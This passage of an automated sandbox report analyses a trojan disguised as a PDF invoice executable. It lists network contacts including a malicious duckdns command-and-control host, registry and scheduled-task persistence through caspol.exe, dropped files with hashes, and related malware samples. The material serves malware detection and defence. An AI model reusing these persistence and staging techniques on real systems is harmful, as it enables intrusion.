              NameSourceMaliciousAntivirus DetectionReputation
              https://doc-0c-b0-docs.googleusercontent.com/CasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://doc-0c-b0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5qCasPol.exe, 00000008.00000003.167744785159.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167481132146.00000000071F4000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrorDPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, Windowss.exe.8.drfalse
                    		high
                    http://google.comCasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/CasPol.exe, 00000008.00000003.167744785159.000000000717A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.167744785159.0000000007162000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://doc-0c-b0-docs.googleusercontent.com/HCasPol.exe, 00000008.00000003.167744785159.0000000007194000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.186.161
                          		googlehosted.l.googleusercontent.comUnited States
                          		15169GOOGLEUSfalse
                          142.250.185.110
                          		drive.google.comUnited States
                          		15169GOOGLEUSfalse
                          91.193.75.146
                          		masterpat0nms672ns.duckdns.orgSerbia
                          		209623DAVID_CRAIGGGtrue

                          General Information

                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:798398
                          Start date and time:2023-02-04 03:52:29 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Run name:Suspected Instruction Hammering
                          Number of analysed new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@11/16@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 63.1% (good quality ratio 61.9%)
                          • Quality average: 88.1%
                          • Quality standard deviation: 22.3%
                          HCA Information:
                          • Successful, ratio: 89%
                          • Number of executed functions: 80
                          • Number of non-executed functions: 26
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, evoke-windowsservices-tas.msedge.net, ctldl.windowsupdate.com, wdcp.microsoft.com, manage.devcenter.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          03:57:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exe
                          03:57:09Task SchedulerRun new task: DSL Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" s>$(Arg0)
                          03:57:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          91.193.75.146Payment_Swift.exeGet hashmaliciousBrowse
                            Swift 26-08-2030.exeGet hashmaliciousBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              DAVID_CRAIGGGExecuted Contract.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              Request for PO_2023.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              file.exeGet hashmaliciousBrowse
                              • 91.193.75.232
                              YMNHOzSCOj.exeGet hashmaliciousBrowse
                              • 91.193.75.232
                              fg5YWkdBaS.exeGet hashmaliciousBrowse
                              • 91.193.75.131
                              Purchase Contract.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              6o49kaKYzs.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              Solicitation#E62-357.pdf.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              Fully Executed Contract.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              Solicitation#E62-359.pdf.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              SIBAIRQ-PD-PUR-926.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              Payment_EPSON-WF2760#45798.PDF.exeGet hashmaliciousBrowse
                              • 91.193.75.152
                              SHIPPING DOC MBL No - DBA0280069.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              PAYMENT RECEIPT.jsGet hashmaliciousBrowse
                              • 91.193.75.231
                              PK_03987366378-309376536783.scr.exeGet hashmaliciousBrowse
                              • 91.193.75.133
                              F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exeGet hashmaliciousBrowse
                              • 91.193.75.218
                              F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exeGet hashmaliciousBrowse
                              • 91.193.75.218
                              HEUR-Trojan-PSW.MSIL.Agensla.gen-5fd0d9691d08.exeGet hashmaliciousBrowse
                              • 185.140.53.134
                              bIHV.exeGet hashmaliciousBrowse
                              • 91.193.75.150
                              00000000.exeGet hashmaliciousBrowse
                              • 91.193.75.188

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              37f463bf4616ecd445d4a1937da06e19https://www.evernote.com/shard/s382/sh/f9b69993-6eec-7e15-a976-fc976a4bf780/622afa29748bb2cbe1023a2b1c8b1213Get hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              PayApp_EFTPay3540987.htmGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              Payment Pending Authorization Invoice #1103.htmlGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              Check_1516434_20230109_56140.htmGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              http://tricarelonline.comGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              4486247862665655146.htmlGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              SWiCode_7309.htmlGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              #Ud83d#Udd12 Payment-Shared-Documents.HtML.htmLGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              Purchase order 50048205_JPG.exeGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              https://ipfs.io/ipfs/QmV5gNiwiin4C1wgqoymu9yvip9d74JSgsMtNSUasA9RgM?filename=g45-0gjr-w9hgn-w9djvgf-ethg-w9jgnf-9e3whrg-9j-9jff.htmlGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              https://invoice-a2ac5f.webflow.io/Get hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              2023-Hinckleyallen-Financial Report.htmlGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              2023-Hinckleyallen-Financial Report.htmlGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              https://murchison-blasting.murchisonc.com/?Get hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              https://rath-group.ziflow.io/proof/5nl66vlpnmbck49dtqu2fi5iftGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              https://lovelycanecorsoforsale.com/Get hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              SecuriteInfo.com.Gen.Variant.Nemesis.17055.366.4698.exeGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              https://ipfs.io/ipfs/QmbugYFxQci7be4Trg2Ty2gTWeLRcnoP1gY6EicXTbG4Jd?filename=auto.html#Acarlson@drinkbodyarmor.comGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110
                              Ordine Acquisto n. 1000052006_5870078070.exeGet hashmaliciousBrowse
                              • 142.250.186.161
                              • 142.250.185.110

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dllTicari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                  Wyciag_26_08102045800000190201217926.exeGet hashmaliciousBrowse
                                    Wyciag_26_08102045800000190201217926.exeGet hashmaliciousBrowse
                                      Mensajes en cuarentena.zipGet hashmaliciousBrowse
                                        Mensajes en cuarentena (1).zipGet hashmaliciousBrowse
                                          Mensajes en cuarentena.zipGet hashmaliciousBrowse
                                            resurrectionist.exeGet hashmaliciousBrowse
                                              resurrectionist.exeGet hashmaliciousBrowse
                                                Factura.exeGet hashmaliciousBrowse
                                                  Factura.exeGet hashmaliciousBrowse
                                                    Mensajes en cuarentena (1).zipGet hashmaliciousBrowse
                                                      Mensajes en cuarentena.zipGet hashmaliciousBrowse
                                                        Wyciag_26_08102045800000190201217926.exeGet hashmaliciousBrowse
                                                          Wyciag_26_08102045800000190201217926.exeGet hashmaliciousBrowse
                                                            firefox_setup.exeGet hashmaliciousBrowse
                                                              firefox_setup.exeGet hashmaliciousBrowse
                                                                RQT-200817-69 JAN 2023.htmlGet hashmaliciousBrowse
                                                                  scan_file.PDF.exeGet hashmaliciousBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Deskriptiv155\Hjertere\Hynde.Una

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:ASCII text, with very long lines (34794), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):34794
                                                                    Entropy (8bit):3.9997795398371228
                                                                    Encrypted:false
                                                                    SSDEEP:768:ccaHQHD7RgNO/PDcbf/CBrmE4Hi1r1scfUos2cX7nhL/djYY2v:iQHDyO4mrei7sqc7BdsYG
                                                                    MD5:DD18A90498456DFCAE95A46AFC33C475
                                                                    SHA1:65AB8F8342AF9C08FE39E7664E3DF9C9646DF211
                                                                    SHA-256:856D7590AB2EFC8C760BC37D652D5AE8A5DE982891ADB7A678E43A91D268DDE9
                                                                    SHA-512:BC6F1AED9B60D3C383E0A65C19E2FF031252DC9B193AE6AD3B5B6F3767EC2F7E6E6E4B3F65D2A3CBD501ED38C838C89A9648D255EAF1110BD7C5A0142F0A6A10
                                                                    Malicious:false
                                                                    Preview:6A34F0604AEE6DB314B378246D35FE80BFC162A6BA9C27C8E16DA2C9AE4B52DFB6BB4D14CCFA23C4B675E918121507BB7243C36C59FB457F64D397E98034F58490327D6C90C000BCD403F4272BEC91D0A33E5A0129628A58358949F71B9E468413A9F921ED449BFDFDFD8B52A2D79EC29D74E20791961A6CBC321812874EFFDA002DA4B6728BAC6F6A19E8DAA48014568DAC10440B68FF4911CE9C39E654E7BD5108097717BE2EF95C1A30EEFB3987C46DF521EAF29935CD47E5E692C36B39093D4C54B8F75D591A0FBE8521B1B811C1D5DE94F2446E4C6E3A52F9AF8CE6352838F7BFA2A9F2E978B6C63E24B131DB84C3D58F2272E6196F60D39BC78BC16F84DBD6729C7BE4C34C92F59F36A74676FEDD70E5E836CF8087A82BD101F899808FB96B6190BA47B820A5BABE361E59EC9FCCD938CFB68F2B3E0A7B59E68314002BFA8EE8E502796C53CD4716076F9F492DF2833BD6AD60228D25C9991C11A6CB28FAA225570F38AE4FC0F98A17CA0400AD9C6D66D92018971C0D79A5062B675A80F3A3E62E9196691C5DC24E022A718CA4F8012CAFE8F14181671A95F9D9650843B5EDCB80A8B14070975B13838161A8EFC0EB2E3233CE381BB0D822E3EA392FBE123D51467413E23E06FFF39AE85E5BAC5549DB7B405C6BEAC058711C90F3D73941BE2013BCBB2FC5FD5660B746D980317AD92DA8

                                                                    C:\Users\user\AppData\Local\Deskriptiv155\Hjertere\Rouleredes.coe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):223928
                                                                    Entropy (8bit):7.720384553629306
                                                                    Encrypted:false
                                                                    SSDEEP:3072:c5Nv/wHlbfgXh62+XKffH2i5A3Mz3xDD1TiBonOxOo0TUhBj4g2RgYyv:c5NvAbfgsrX6qMFdTiBQhooSBj4g2d4
                                                                    MD5:B32FFE1EC6ECA11009C35A0829450CB1
                                                                    SHA1:146529AFE038064ED79CAE0C62B108A14276D459
                                                                    SHA-256:151A299FCA8F459B7670EA4922931161D6E8024B19F1C723130F6576ACBDBC83
                                                                    SHA-512:CC32C0713B6E3C83D00682A73F2DB20FEAB0EBCD39A2CD768728FA9AD437CE0C24A6EBA7367DEC162447C14533064B93A2EB8422C843186AADADD6BEB99D7E4C
                                                                    Malicious:false
                                                                    Preview:..wh..8..ArM.0).LL....-G..t..N..."V.M.\og..Q].N...i.4...%.VV1.hK.'/..&.*$.U<....@.n..@..H.(.6......C.i....z\uy.R.1.f...u.-..S..f....[5A..:b.....p...'..K..g.2O..A........MGO....j.......l.N^...7W..$.6..D.q.....P&~.b4.Y8.@..n.......p..$.V.;.8|k.\69+.P..Fr1.*.M$.Y.c..?.T...n.....0......%.m%.#J._....<&-...%..v..4P..=..lz.YR.j.2.).j.*t..E.V......U...7.R...G.+..ux.Fmg.n..D....jz7...|...&.]K....A.....`oy..FM...(d:wx.._V....Y.bs..f.^$...Q.MZ.O.0.....x.a.t.nk.d....h3n.J8..R.$7..D2..g..f ... )..c..=8C.. N.....B.a"...z..&...e............'B%-2.Z.*......&.B.....q5/..A.xG.R3B..@.|.V.ss.*Y.P..iM.1.F0>....S..{gSc.^.<.kT..A.....%..w..A.........3..{.3id..?....-trml..O......TH.qU.A.....].a.H.Q4.R.&.Dh.?....8e................0Sf..r......._..S....~..<.i...*0.d...+.^..Ou(.6&.>....,*^.w....-:0..=."......I.....H....T.B.F.(..J.3#...f...8...-1.e...j.....{4....!....AG^%.....L./.$........Qz.T.H.....1.r..?D8*'.n..b>( fo.w......,....&......}/6.(..#UJ0.lWB....

                                                                    C:\Users\user\AppData\Local\Deskriptiv155\Hjertere\checkbox_checked.png

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:PNG image data, 32 x 32, 2-bit colormap, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):147
                                                                    Entropy (8bit):5.579261213353732
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPl3MrpxyPuReVl/nRwPd/ggZcFmz3iVVyjXrC5RlH1p:6v/lhP6TwOeVV6Pd/MmgEK5RlVp
                                                                    MD5:0CA13C84736F193C4DDC36408B63EB79
                                                                    SHA1:DAF222B1B08D7F2645FDC2E25E63BE2AA50E9B79
                                                                    SHA-256:9B7DA86B40E8FE9DA37BA2A4337C9BCE14B07153A9722DD3DE7772C1C5933DED
                                                                    SHA-512:1F95694E920B1BE5A7D9A4C4F7EABCCDE8326965D8B1E3211085C67E84229F76300AED6AE29E2D79E817857CFE7608919233057FAD6FDA3BF515C59F3604099C
                                                                    Malicious:false
                                                                    Preview:.PNG........IHDR... ... ........g....PLTE.........f.0....tRNS..v..8...7IDATx.c..............(."..@.& .....R;X...D8.....a^......N'\..+....IEND.B`.

                                                                    C:\Users\user\AppData\Local\Deskriptiv155\Hjertere\multimedia-volume-control-symbolic.svg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):651
                                                                    Entropy (8bit):5.228667299529662
                                                                    Encrypted:false
                                                                    SSDEEP:12:t4Cp9xXnlWjoprGDWXYmfM26oprGhyGuC1hz4AeWrGdKdK:t4CpPlWsrGDoY32/rGYG/4AeWrGMQ
                                                                    MD5:367D90E6DF90CE72BAD009701DC3D941
                                                                    SHA1:C2070B79640687DBB8A64BFAC953CFA7625F7FFF
                                                                    SHA-256:2F11A00CC5DD755C1E5054AEF16CE293716532140B3DDB0F0623ABD460F99571
                                                                    SHA-512:F6DA3687D0676C11CD4B3D3F4C71797059DD62B05F09DC981684155671EB7924E6096B084DF43664D09B1A13BFADFE61C1FB678B3323ED7E9984EB8D7A2D19BC
                                                                    Malicious:false
                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M2 5h2.484l2.97-3H8v12h-.475l-3.04-3H2z" style="marker:none" color="#bebebe" overflow="visible"/><path d="M14 8c0-2.166-.739-4.02-2-5h-1v2c.607.789 1 1.76 1 3 0 1.241-.393 2.22-1 3v2h1c1.223-.995 2-2.873 2-5z" style="marker:none" color="#000" overflow="visible"/><path d="M11 8c0-1.257-.312-2.216-1-3H9v6h1c.672-.837 1-1.742 1-3z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#000" font-weight="400" font-family="Sans" overflow="visible"/></g></svg>

                                                                    C:\Users\user\AppData\Local\Deskriptiv155\Hjertere\phone-symbolic.svg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):629
                                                                    Entropy (8bit):4.45278069770929
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdPnnl/nu3tln5CfYUtLLgpvAjmAKWlzmOA/e7/lsEbWlM:2dPnnxu3tlQfjngEmAKvOA/U/lsEbN
                                                                    MD5:DA3858070B89AA5D3B4D5FC724BED12F
                                                                    SHA1:A923CDD523E0519E96147A05DE6D0024135127E4
                                                                    SHA-256:3CC19ADDFE48119EB91D48E7FE510920394DC96F3006C384FFD4F63B92A73480
                                                                    SHA-512:FF7BE5CC591CD146E56DD22BCB9FD82A21272592EA7E807B57F8D33E77DA7FB2C632CA12980B0B8CDA4028C5802EA803BC75A642714B80AAC244538E4819E502
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.355469 3 -3 v -10 c 0 -1.644531 -1.355469 -3 -3 -3 z m 0 2 h 4 c 0.570312 0 1 0.429688 1 1 v 10 c 0 0.570312 -0.429688 1 -1 1 h -4 c -0.570312 0 -1 -0.429688 -1 -1 v -10 c 0 -0.570312 0.429688 -1 1 -1 z m 0 0"/>. <path d="m 7 1 h 2 c 0.550781 0 1 0.449219 1 1 s -0.449219 1 -1 1 h -2 c -0.550781 0 -1 -0.449219 -1 -1 s 0.449219 -1 1 -1 z m 0 0"/>. </g>.</svg>.

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\caspol.exe.log

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):20
                                                                    Entropy (8bit):3.6841837197791887
                                                                    Encrypted:false
                                                                    SSDEEP:3:QHXMKas:Q3Las
                                                                    MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                                                    SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                                                    SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                                                    SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..

                                                                    C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.656065698421856
                                                                    Encrypted:false
                                                                    SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                                                    MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                                                    SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                                                    SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                                                    SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: Ticari Hesap #U00d6zetiniz.exe, Detection: malicious, Browse
                                                                    • Filename: Ticari Hesap #U00d6zetiniz.exe, Detection: malicious, Browse
                                                                    • Filename: Wyciag_26_08102045800000190201217926.exe, Detection: malicious, Browse
                                                                    • Filename: Wyciag_26_08102045800000190201217926.exe, Detection: malicious, Browse
                                                                    • Filename: Mensajes en cuarentena.zip, Detection: malicious, Browse
                                                                    • Filename: Mensajes en cuarentena (1).zip, Detection: malicious, Browse
                                                                    • Filename: Mensajes en cuarentena.zip, Detection: malicious, Browse
                                                                    • Filename: resurrectionist.exe, Detection: malicious, Browse
                                                                    • Filename: resurrectionist.exe, Detection: malicious, Browse
                                                                    • Filename: Factura.exe, Detection: malicious, Browse
                                                                    • Filename: Factura.exe, Detection: malicious, Browse
                                                                    • Filename: Mensajes en cuarentena (1).zip, Detection: malicious, Browse
                                                                    • Filename: Mensajes en cuarentena.zip, Detection: malicious, Browse
                                                                    • Filename: Wyciag_26_08102045800000190201217926.exe, Detection: malicious, Browse
                                                                    • Filename: Wyciag_26_08102045800000190201217926.exe, Detection: malicious, Browse
                                                                    • Filename: firefox_setup.exe, Detection: malicious, Browse
                                                                    • Filename: firefox_setup.exe, Detection: malicious, Browse
                                                                    • Filename: RQT-200817-69 JAN 2023.html, Detection: malicious, Browse
                                                                    • Filename: scan_file.PDF.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsxE304.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):296163
                                                                    Entropy (8bit):7.470506584929792
                                                                    Encrypted:false
                                                                    SSDEEP:6144:X5NvAbfgsrX6qMFdTiBQhooSBj4g2dgQ20cP7m:JjvTiapwjGdf20cP7m
                                                                    MD5:E0FD6297CF0E89D773C0AE44ED514229
                                                                    SHA1:EE4E3DEC2FFAD8B11887DD600B3A5D75982F0170
                                                                    SHA-256:5511DCF0AEFA2FDE583BEB5703774277C3ECB68B48AFA8B5D7F89F641B1F87F3
                                                                    SHA-512:5911A30953430870D7468C7BD48B57435FD6898800FC81EFA42FD340222E938D1C0889432C413163BC777044B412EF92A72740489FA620FE7220143D0A5A1C56
                                                                    Malicious:false
                                                                    Preview:.^......,...................W...x?.......]......l^..........................................................................................................................................................................................................................................G...X...............j...............................................................................................................................a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exe

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):348136
                                                                    Entropy (8bit):7.836361315282437
                                                                    Encrypted:false
                                                                    SSDEEP:6144:twq3NpWyFr7S0HFwnNHF6pmK2DIuua9ma+T4cX+tTMZP3qtTaPwkYn5inpT4:tzayFfDwNg4RE864c4MZ/c2UinS
                                                                    MD5:91C0C4710DB096A4689D40E2CEB3814D
                                                                    SHA1:63880C602B960C5F91E55CBE4D5D18C7B8F1D63A
                                                                    SHA-256:A4D4961D124EA4276512C1584F1EBD30951CD469659B3A623594D6361772FAE7
                                                                    SHA-512:B5FC41A609EFB2946DDCE21F383B5AE8E70D93B0FD0DEC8E48B27F7660569CCDBAFE806BF56FC0CD7C4E43826B79F065D57CD66DA3C27E865CDCED3CA865EB2A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                    • Antivirus: Virustotal, Detection: 46%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@.......................... ............@.........................................................................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tmp673D.tmp

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1319
                                                                    Entropy (8bit):5.131285242271578
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnJxtn:cbk4oL600QydbQxIYODOLedq3ZJj
                                                                    MD5:497F298FC157762F192A7C42854C6FB6
                                                                    SHA1:04BEC630F5CC64EA17C0E3E780B3CCF15A35C6E0
                                                                    SHA-256:3462CBE62FBB64FC53A0FCF97E43BAAFE9DD9929204F586A86AFE4B89D8048A6
                                                                    SHA-512:C7C6FD3097F4D1CCD313160FEDF7CB031644E0836B8C3E25481095E5F4B003759BC84FC6EA9421E3A090E66DC2FF875FEC2F394A386691AB178CB164733411B2
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\catalog.dat

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):232
                                                                    Entropy (8bit):7.089541637477408
                                                                    Encrypted:false
